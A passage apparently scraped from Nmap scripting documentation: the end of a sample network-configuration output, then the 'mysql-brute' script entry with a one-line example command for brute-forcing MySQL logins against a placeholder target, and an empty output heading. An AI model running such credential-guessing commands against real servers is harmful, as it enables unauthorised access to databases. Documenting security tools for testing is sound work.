|      Physical Address. . . . . . . . . : 08-00-DE-AD-C0-DE
|      DHCP Enabled. . . . . . . . . . . : Yes
|      Autoconfiguration Enabled . . . . : Yes
|      IP Address. . . . . . . . . . . . : 192.168.56.3
|      Subnet Mask . . . . . . . . . . . : 255.255.255.0
|      Default Gateway . . . . . . . . . :
|      DHCP Server . . . . . . . . . . . : 192.168.56.2
|      Lease Obtained. . . . . . . . . . : den 21 mars 2010 00:12:10
|      Lease Expires . . . . . . . . . . : den 21 mars 2010 01:12:10
|

mysql-brute

Example Usage

nmap -sV --script=mysql-brute <target>

Script Output

阅读全文...
